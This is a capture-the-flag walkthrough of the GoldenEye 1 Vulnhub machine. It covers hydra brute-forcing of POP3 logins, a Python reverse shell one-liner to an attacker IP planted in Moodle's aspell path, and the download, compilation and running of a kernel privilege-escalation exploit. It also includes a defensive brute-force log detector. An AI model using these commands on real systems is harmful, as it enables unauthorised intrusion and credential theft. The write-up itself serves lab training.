Golden Eye 1
Golden Eye Vulnhub Walkthrough
Enumeration
nmap
nmap -sC -sV -oA nmap/GEv1 192.168.1.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds
nmap -p- -Pn 192.168.1.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds
The full port scan shows two more open ports, 55006 and 55007, that the default top-1000 scan did not report.
Let's open the IP address in a web browser.

Let's navigate to /sev-home

Going back to the main page and opening the browser's inspect-element view, we can see a JavaScript file.

We can see an encrypted password. I copied it and pasted it into the Google search bar, and surprisingly got this:

The username is obviously boris, and we can log in.

We can see that there is a POP3 server running.
If we use nmap to run version detection against both unknown ports:
nmap -sV -p 55006,55007 192.168.1.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
55006/tcp open ssl/unknown
55007/tcp open pop3 Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds
We now know that port 55007 is running POP3 (Dovecot) and that 55006 is its TLS-wrapped counterpart.
Exploitation
Hydra
Then we can brute force the POP3 passwords of boris and natalya:
hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007


Got the password! We can now log in to the POP3 server:
nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2
RETR 3

Nothing here seems very interesting, so we move on to natalya.
Doing the same as for boris, we get something pretty interesting here:

We got credentials, and the email says to add the server IP to /etc/hosts as severnaya-station.com.
After doing that, we can go to the browser and navigate to severnaya-station.com/gnocertdir

We can log in with the credentials we were given.
Then we can navigate to Messages, where we can see another username, doak.

Now we can take the username doak and brute force its POP3 password with hydra again:
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
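Each of the hydra runs on this page (boris and natalya above, doak here) produces a burst of failed POP3 logins from one source address, followed by a success once the wordlist hits. Below is an added example (not part of the original walkthrough) of the detection logic a defender would run over Dovecot's pop3-login messages: it keeps a sliding window of failed attempts per source IP, raises an alert when the count reaches a threshold, and records any successful login from that address afterwards, which is the signal that the brute force worked. The log lines are constructed for this example in the shape of Dovecot's syslog output (they are not real logs from the VM); the threshold and window values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Set

# Constructed sample lines shaped like Dovecot's "pop3-login" syslog messages
# (not real logs from the GoldenEye VM). 192.168.1.113 plays the attacking
# host from the walkthrough; 192.168.1.50 is a normal user who mistyped once.
SAMPLE_LOG = """\
May 23 10:28:01 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, session=<a1>
May 23 10:28:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, session=<a2>
May 23 10:28:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, session=<a3>
May 23 10:28:04 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, session=<a4>
May 23 10:28:05 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, session=<a5>
May 23 10:28:06 ubuntu dovecot: pop3-login: Login: user=<boris>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, mpid=2101, session=<a6>
May 23 10:29:01 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, session=<a7>
May 23 10:29:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, session=<a8>
May 23 10:29:03 ubuntu dovecot: pop3-login: Login: user=<natalya>, method=PLAIN, rip=192.168.1.113, lip=192.168.1.116, mpid=2130, session=<a9>
May 23 10:40:00 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 3 secs): user=<natalya>, method=PLAIN, rip=192.168.1.50, lip=192.168.1.116, session=<b1>
May 23 10:45:00 ubuntu dovecot: pop3-login: Login: user=<natalya>, method=PLAIN, rip=192.168.1.50, lip=192.168.1.116, mpid=2150, session=<b2>
"""

# Matches both the failure form ("Disconnected (auth failed, N attempts in S secs)")
# and the success form ("Login:"), capturing the syslog timestamp, user and
# remote IP (rip=).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed, (?P<n>\d+) attempts in \d+ secs\)): "
    r"user=<(?P<user>[^>]*)>, .*?rip=(?P<rip>[\d.]+)"
)


def detect_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60) -> List[dict]:
    """One alert per source IP whose failed POP3 logins within any
    window_seconds-long sliding window reach `threshold`. The alert also
    lists the usernames tried and any logins that succeeded after the alert
    fired (likely compromised accounts)."""
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    users_tried: Dict[str, Set[str]] = defaultdict(set)
    alerts: Dict[str, dict] = {}

    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        # Syslog timestamps carry no year; only deltas matter here.
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        rip, user = m.group("rip"), m.group("user")

        if m.group("event") == "Login":
            if rip in alerts:
                alerts[rip]["logins_after_failures"].append(user)
            continue

        users_tried[rip].add(user)
        window = failures[rip]
        for _ in range(int(m.group("n"))):
            window.append(ts)
        # Drop attempts older than the window.
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()

        if rip in alerts:
            alerts[rip]["max_failures_in_window"] = max(
                alerts[rip]["max_failures_in_window"], len(window))
        elif len(window) >= threshold:
            alerts[rip] = {
                "rip": rip,
                "first_seen": m.group("ts"),
                "max_failures_in_window": len(window),
                "logins_after_failures": [],
            }

    for rip, alert in alerts.items():
        alert["users_tried"] = sorted(users_tried[rip])
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

On the sample log this yields a single alert for 192.168.1.113: five failures inside one minute, two usernames tried, and successful logins as both boris and natalya afterwards. The one mistyped password from 192.168.1.50 never reaches the threshold and produces no alert, which is the point of windowing by source address rather than counting failures globally.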

We got the credentials, so we can go back to the POP3 server and log in:

This mail gives us another set of credentials, so we go back to Moodle and log in.

We then go to Private files, where there is an s3cret.txt.

After cat-ing the file, we get this:

The file says that a picture leads to the admin credentials, and it contains a link. If we follow the link:

If we download the picture and use the strings command to list all of its readable content, we get this:

We can see that there is a base64-encoded line.
After decoding it, we get:

Let's log in to Moodle using the credentials we just got.

After playing around, I found that under Site administration, Plugins, Text editors, there is a TinyMCE HTML editor.
We need to change the spell engine from Google Spell to PSpellShell.

Then, under Server, System paths, there is a "Path to aspell" setting.
Reverse Shell
I tried a netcat reverse shell, but it didn't work, so we set the aspell path to a Python reverse shell instead:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then we set up a listener on our machine:
nc -nlvp 4444
Then we can go to the blog and add a new entry.

After that, click the spell check button to trigger the reverse shell.


Then we can upgrade to an interactive TTY with a Python one-liner:
python -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation
If we type uname -a, we can see that the kernel is out of date.

We can then searchsploit the kernel version.

After that we can copy the exploit to our working directory. I tried transferring it to the target machine, but gcc is not available there; cc is.
So we need to change something in the exploit: change gcc to cc.


Then on our machine we can start a SimpleHTTPServer using Python:
python -m SimpleHTTPServer

On the target machine, navigate to the /tmp directory and wget the file.

Then we can compile and run it:
cc 37292.c -o exploit
chmod +x exploit
./exploit

Navigate to /root and get .flag.txt.

Then we can navigate to the URL it provides.

Congratulations!